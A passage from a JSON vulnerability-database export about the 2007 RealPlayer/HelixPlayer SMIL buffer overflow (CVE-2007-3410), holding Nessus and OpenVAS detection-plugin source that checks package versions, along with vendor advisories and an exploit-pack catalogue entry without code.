\"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-15T15:05:34", "references": ["https://www.redhat.com/security/data/cve/CVE-2007-2263.html", "http://rhn.redhat.com/errata/RHSA-2007-0841.html", "https://www.redhat.com/security/data/cve/CVE-2007-3410.html", "https://www.redhat.com/security/data/cve/CVE-2007-5081.html", "https://www.redhat.com/security/data/cve/CVE-2007-2264.html"], "pluginID": "40707", "description": "An updated RealPlayer package that fixes a security flaw is now available for Red Hat Enterprise Linux 3 Extras, 4 Extras, and 5 Supplementary.\n\nThis update has been rated as having critical security impact by the Red Hat Security Response Team.\n\nRealPlayer is a media player that provides media playback locally and via streaming.\n\nA buffer overflow flaw was found in the way RealPlayer processed Synchronized Multimedia Integration Language (SMIL) files. It was possible for a malformed SMIL file to execute arbitrary code with the permissions of the user running RealPlayer. (CVE-2007-3410)\n\nAll users of RealPlayer are advised to upgrade to this updated package containing RealPlayer version 10.0.9 which is not vulnerable to this issue.", "edition": 4, "reporter": "Tenable", "published": "2009-08-24T00:00:00", "title": "RHEL 3 / 4 / 5 : RealPlayer (RHSA-2007:0841)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-2264", "CVE-2007-2263", "CVE-2007-5081", "CVE-2007-3410"], "modified": "2018-08-13T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:3", "cpe:/o:redhat:enterprise_linux:4", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:realplayer", "p-cpe:/a:redhat:enterprise_linux:RealPlayer"], "id": "REDHAT-RHSA-2007-0841.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=40707", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2007:0841. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(40707);\n script_version (\"1.27\");\n script_cvs_date(\"Date: 2018/08/13 14:32:37\");\n\n script_cve_id(\"CVE-2007-2263\", \"CVE-2007-2264\", \"CVE-2007-3410\", \"CVE-2007-5081\");\n script_xref(name:\"RHSA\", value:\"2007:0841\");\n\n script_name(english:\"RHEL 3 / 4 / 5 : RealPlayer (RHSA-2007:0841)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated RealPlayer package that fixes a security flaw is now\navailable for Red Hat Enterprise Linux 3 Extras, 4 Extras, and 5\nSupplementary.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nRealPlayer is a media player that provides media playback locally and\nvia streaming.\n\nA buffer overflow flaw was found in the way RealPlayer processed\nSynchronized Multimedia Integration Language (SMIL) files. It was\npossible for a malformed SMIL file to execute arbitrary code with the\npermissions of the user running RealPlayer. (CVE-2007-3410)\n\nAll users of RealPlayer are advised to upgrade to this updated package\ncontaining RealPlayer version 10.0.9 which is not vulnerable to this\nissue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-2263.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-2264.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-3410.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-5081.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2007-0841.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected RealPlayer and / or realplayer packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:RealPlayer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:realplayer\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/08/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/08/24\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/06/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(3|4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 3.x / 4.x / 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i386\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2007:0841\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL3\", cpu:\"i386\", reference:\"realplayer-10.0.9-0.rhel3.4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"RealPlayer-10.0.9-2\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"RealPlayer-10.0.9-3.el5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"RealPlayer / realplayer\");\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-07-30T13:50:53", "references": ["http://seclists.org/fulldisclosure/2007/Oct/925", "http://www.securityfocus.com/archive/1/482856/30/0/threaded", "http://service.real.com/realplayer/security/10252007_player/en/", "http://seclists.org/fulldisclosure/2007/Oct/922", "http://seclists.org/fulldisclosure/2007/Oct/924", "http://www.securityfocus.com/archive/1/482855/30/0/threaded", "http://www.securityfocus.com/archive/1/482942/30/0/threaded"], "pluginID": "27591", "description": "According to its build number, the installed version of RealPlayer / RealOne Player / RealPlayer Enterprise on the remote Windows host suffers from several buffer overflows involving specially crafted media files (eg, '.mp3', '.rm', '.SMIL', '.swf', '.ram', and '.pls'). If an attacker can trick a user on the affected system into opening such a file or browsing to a specially crafted web page, he may be able to exploit one of these issues to execute arbitrary code subject to the user's privileges on the affected host.", "edition": 5, "reporter": "Tenable", "published": "2007-10-30T00:00:00", "title": "RealPlayer for Windows < Build 6.0.12.1662 Multiple Vulnerabilities", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "naslFamily": "Windows", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-4599", "CVE-2007-2264", "CVE-2007-2263", "CVE-2007-5081", "CVE-2007-3410", "CVE-2007-5080"], "modified": "2018-07-25T00:00:00", "cpe": ["cpe:/a:realnetworks:realplayer"], "id": "REALPLAYER_6_0_12_1662.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=27591", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(27591);\n script_version(\"1.20\");\n\n script_cve_id(\"CVE-2007-2263\", \"CVE-2007-2264\", \"CVE-2007-3410\",\n \"CVE-2007-4599\", \"CVE-2007-5080\", \"CVE-2007-5081\");\n script_bugtraq_id(24658, 26214, 26284);\n\n script_name(english:\"RealPlayer for Windows < Build 6.0.12.1662 Multiple Vulnerabilities\");\n script_summary(english:\"Checks RealPlayer build number\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows application is affected by several buffer overflow\nvulnerabilities.\" );\n script_set_attribute(attribute:\"description\", value:\n\"According to its build number, the installed version of RealPlayer /\nRealOne Player / RealPlayer Enterprise on the remote Windows host\nsuffers from several buffer overflows involving specially crafted\nmedia files (eg, '.mp3', '.rm', '.SMIL', '.swf', '.ram', and '.pls'). \nIf an attacker can trick a user on the affected system into opening\nsuch a file or browsing to a specially crafted web page, he may be\nable to exploit one of these issues to execute arbitrary code subject\nto the user's privileges on the affected host.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/482855/30/0/threaded\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/482856/30/0/threaded\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/482942/30/0/threaded\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/fulldisclosure/2007/Oct/922\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/fulldisclosure/2007/Oct/924\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/fulldisclosure/2007/Oct/925\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://service.real.com/realplayer/security/10252007_player/en/\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to RealPlayer 10.5 build 6.0.12.1662 / RealPlayer Enterprise\nbuild 6.0.11.2160 or later. \n\nNote that the vendor's advisory states that build numbers for\nRealPlayer 10.5 are not sequential.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(119, 189);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2007/10/30\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2007/06/26\");\n script_cvs_date(\"Date: 2018/07/25 18:58:06\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2007/10/05\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"local\");\nscript_set_attribute(attribute:\"cpe\", value:\"cpe:/a:realnetworks:realplayer\");\nscript_end_attributes();\n\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"realplayer_detect.nasl\");\n script_require_keys(\"SMB/RealPlayer/Product\", \"SMB/RealPlayer/Build\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\n\n\nprod = get_kb_item(\"SMB/RealPlayer/Product\");\nif (!prod) exit(0);\n\n\nbuild = get_kb_item(\"SMB/RealPlayer/Build\");\nif (!build) exit(0);\n\nver = split(build, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n\nvuln = FALSE;\nif (\"RealPlayer\" == prod)\n{\n # nb: build numbers ARE NOT NECESSARILY SEQUENTIAL!\n if (\n ver[0] < 6 ||\n (\n ver[0] == 6 && ver[1] == 0 && \n (\n ver[2] < 12 ||\n (\n ver[2] == 12 && \n (\n ver[3] <= 1578 ||\n ver[3] == 1698 ||\n ver[3] == 1741\n )\n )\n )\n )\n ) vuln = TRUE;\n}\nelse if (\"RealPlayer Enterprise\" == prod)\n{\n # Fix is 6.0.11.2160 per \n # <http://service.real.com/realplayer/security/security/enterprise_102507.html>.\n if (\n ver[0] < 6 ||\n (\n ver[0] == 6 && ver[1] == 0 && \n (\n ver[2] < 11 ||\n (ver[2] == 11 && ver[3] < 2160)\n )\n )\n ) vuln = TRUE;\n}\nelse if (\"RealOne Player\" == prod)\n{\n vuln = TRUE;\n}\n\n\nif (vuln)\n{\n if (report_verbosity)\n {\n report = string(\n \"\\n\",\n prod, \" build \", build, \" is installed on the remote host.\\n\"\n );\n security_hole(port:get_kb_item(\"SMB/transport\"), extra:report);\n }\n else security_hole(get_kb_item(\"SMB/transport\"));\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "centos": [{"lastseen": "2017-10-12T14:44:51", "references": ["https://rhn.redhat.com/errata/RHSA-2007-0605.html"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.6-0.EL4.2.0.2", "packageFilename": "HelixPlayer-1.0.6-0.EL4.2.0.2.src.rpm", "packageName": "HelixPlayer", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.6-0.EL4.2.0.2", "packageFilename": "HelixPlayer-1.0.6-0.EL4.2.0.2.src.rpm", "packageName": "HelixPlayer", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.6-0.EL4.2.0.2", "packageFilename": "HelixPlayer-1.0.6-0.EL4.2.0.2.i386.rpm", "packageName": "HelixPlayer", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.6-0.EL4.2.0.2", "packageFilename": "HelixPlayer-1.0.6-0.EL4.2.0.2.i386.rpm", "packageName": "HelixPlayer", "arch": "i386", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2007:0605\n\n\nHelixPlayer is a media player.\r\n\r\nA buffer overflow flaw was found in the way HelixPlayer processed\r\nSynchronized Multimedia Integration Language (SMIL) files. It was possible\r\nfor a malformed SMIL file to execute arbitrary code with the permissions of\r\nthe user running HelixPlayer. (CVE-2007-3410)\r\n\r\nAll users of HelixPlayer are advised to upgrade to this updated package,\r\nwhich contains a backported patch and is not vulnerable to this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2007-June/013994.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-June/013995.html\n\n**Affected packages:**\nHelixPlayer\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2007-0605.html", "edition": 2, "reporter": "CentOS Project", "published": "2007-06-28T09:45:28", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "HelixPlayer security update", "type": "centos", "bulletinFamily": "unix", "cvelist": ["CVE-2007-3410"], "modified": "2007-06-28T09:45:34", "href": "http://lists.centos.org/pipermail/centos-announce/2007-June/013994.html", "id": "CESA-2007:0605", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:34", "references": [], "description": "# No description provided by the source\n\n## References:\nVendor Specific News/Changelog Entry: http://service.real.com/realplayer/security/10252007_player/en/\nSecurity Tracker: 1018297\nSecurity Tracker: 1018299\n[Secunia Advisory ID:25819](https://secuniaresearch.flexerasoftware.com/advisories/25819/)\n[Secunia Advisory ID:26828](https://secuniaresearch.flexerasoftware.com/advisories/26828/)\n[Secunia Advisory ID:27361](https://secuniaresearch.flexerasoftware.com/advisories/27361/)\n[Secunia Advisory ID:25859](https://secuniaresearch.flexerasoftware.com/advisories/25859/)\n[Secunia Advisory ID:26463](https://secuniaresearch.flexerasoftware.com/advisories/26463/)\nRedHat RHSA: RHSA-2007:0605\nRedHat RHSA: RHSA-2007:0841\nOther Advisory URL: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=547\nOther Advisory URL: http://security.gentoo.org/glsa/glsa-200709-05.xml\nMail List Post: http://www.attrition.org/pipermail/vim/2007-October/001841.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-06/0334.html\nISS X-Force ID: 35088\nFrSIRT Advisory: ADV-2007-3628\nFrSIRT Advisory: ADV-2007-2339\n[CVE-2007-3410](https://vulners.com/cve/CVE-2007-3410)\nCERT VU: 770904\nBugtraq ID: 24658\n", "edition": 1, "reporter": "OSVDB", "published": "2007-06-26T07:32:18", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "RealPlayer smlprstime.cpp SmilTimeValue::parseWallClockValue Function SMIL File Handling Overflow", "type": "osvdb", "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2007-3410"], "modified": "2007-06-26T07:32:18", "href": "https://vulners.com/osvdb/OSVDB:38342", "id": "OSVDB:38342", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-04-28T13:20:33", "references": [], "description": "# No description provided by the source\n\n## References:\nSecurity Tracker: 1018297\nSecurity Tracker: 1018299\n[Secunia Advisory ID:25819](https://secuniaresearch.flexerasoftware.com/advisories/25819/)\n[Secunia Advisory ID:26828](https://secuniaresearch.flexerasoftware.com/advisories/26828/)\n[Secunia Advisory ID:25859](https://secuniaresearch.flexerasoftware.com/advisories/25859/)\n[Secunia Advisory ID:26463](https://secuniaresearch.flexerasoftware.com/advisories/26463/)\nRedHat RHSA: RHSA-2007:0605\nRedHat RHSA: RHSA-2007:0841\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200709-05.xml\nOther Advisory URL: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=547\nISS X-Force ID: 35088\nFrSIRT Advisory: ADV-2007-2339\n[CVE-2007-3410](https://vulners.com/cve/CVE-2007-3410)\nCERT VU: 770904\nBugtraq ID: 24658\n", "edition": 1, "reporter": "OSVDB", "published": "2007-06-26T14:49:19", "title": "RealPlayer/Helix Player smlprstime.cpp SmilTimeValue::parseWallClockValue Function SMIL File Handling Overflow", "type": "osvdb", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2007-3410"], "modified": "2007-06-26T14:49:19", "href": "https://vulners.com/osvdb/OSVDB:37374", "id": "OSVDB:37374", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "d2": [{"lastseen": "2016-09-25T14:11:07", "references": [], "description": "**Name**| d2sec_real_wallclock \n---|--- \n**CVE**| CVE-2007-3410 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| RealPlayer ParseWallClockValue Stack Overflow Vulnerability \n**Notes**| \n", "edition": 1, "reporter": "DSquare", "published": "2007-06-26T18:30:00", "title": "DSquare Exploit Pack: D2SEC_REAL_WALLCLOCK", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "d2", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-3410"], "modified": "2007-06-26T18:30:00", "id": "D2SEC_REAL_WALLCLOCK", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_real_wallclock", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oraclelinux": [{"lastseen": "2016-09-04T11:15:56", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.6-0.EL4.2.0.2", "packageFilename": "HelixPlayer-1.0.6-0.EL4.2.0.2.i386.rpm", "packageName": "HelixPlayer", "arch": "i386", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.6-0.EL4.2.0.2", "packageFilename": "HelixPlayer-1.0.6-0.EL4.2.0.2.i386.rpm", "packageName": "HelixPlayer", "arch": "i386", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.6-0.EL4.2.0.2", "packageFilename": "HelixPlayer-1.0.6-0.EL4.2.0.2.src.rpm", "packageName": "HelixPlayer", "arch": "src", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.6-0.EL4.2.0.2", "packageFilename": "HelixPlayer-1.0.6-0.EL4.2.0.2.src.rpm", "packageName": "HelixPlayer", "arch": "src", "operator": "lt"}], "description": " [1.0.6-0.EL4.2.0.2]\n - Rebuild for z-stream bz#245842\n \n [1.0.6-0.EL4.2]\n - Add a fix for CVE-2007-3410 ", "edition": 1, "reporter": "Oracle", "published": "2007-06-27T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "Critical: HelixPlayer security update ", "type": "oraclelinux", "bulletinFamily": "unix", "cvelist": ["CVE-2007-3410"], "modified": "2007-06-27T00:00:00", "id": "ELSA-2007-0605", "href": "http://linux.oracle.com/errata/ELSA-2007-0605.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-25T10:56:06", "references": ["2007-0756", "https://www.redhat.com/archives/fedora-package-announce/2007-June/msg00666.html"], "pluginID": "861058", "description": "Check for the Version of HelixPlayer", "edition": 2, "reporter": "Copyright (C) 2009 Greenbone Networks GmbH", "published": "2009-02-27T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Fedora Update for HelixPlayer FEDORA-2007-0756", "type": "openvas", "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-3410"], "modified": "2017-07-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=861058", "id": "OPENVAS:861058", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for HelixPlayer FEDORA-2007-0756\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"HelixPlayer on Fedora 7\";\ntag_insight = \"Helix Player is an open-source media player built in the Helix\n Community for consumers. Built using GTK, it plays open source formats,\n like Ogg Vorbis and Theora using the powerful Helix DNA Client Media\n Engine.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2007-June/msg00666.html\");\n script_id(861058);\n script_version(\"$Revision: 6623 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:10:20 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 16:31:39 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2007-0756\");\n script_cve_id(\"CVE-2007-3410\");\n script_name( \"Fedora Update for HelixPlayer FEDORA-2007-0756\");\n\n script_summary(\"Check for the Version of HelixPlayer\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC7\")\n{\n\n if ((res = isrpmvuln(pkg:\"HelixPlayer\", rpm:\"HelixPlayer~1.0.7~6.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"HelixPlayer-plugin\", rpm:\"HelixPlayer-plugin~1.0.7~6.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"HelixPlayer-debuginfo\", rpm:\"HelixPlayer-debuginfo~1.0.7~6.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"HelixPlayer\", rpm:\"HelixPlayer~1.0.7~6.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:02", "references": [], "pluginID": "58602", "description": "The remote host is missing updates announced in\nadvisory GLSA 200709-05.", "edition": 2, "reporter": "Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com", "published": "2008-09-24T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Gentoo Security Advisory GLSA 200709-05 (realplayer)", "type": "openvas", "naslFamily": "Gentoo Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-3410"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=58602", "id": "OPENVAS:58602", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"RealPlayer is vulnerable to a buffer overflow allowing for execution of\narbitrary code.\";\ntag_solution = \"All RealPlayer users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-video/realplayer-10.0.9'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200709-05\nhttp://bugs.gentoo.org/show_bug.cgi?id=183421\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200709-05.\";\n\n \n\nif(description)\n{\n 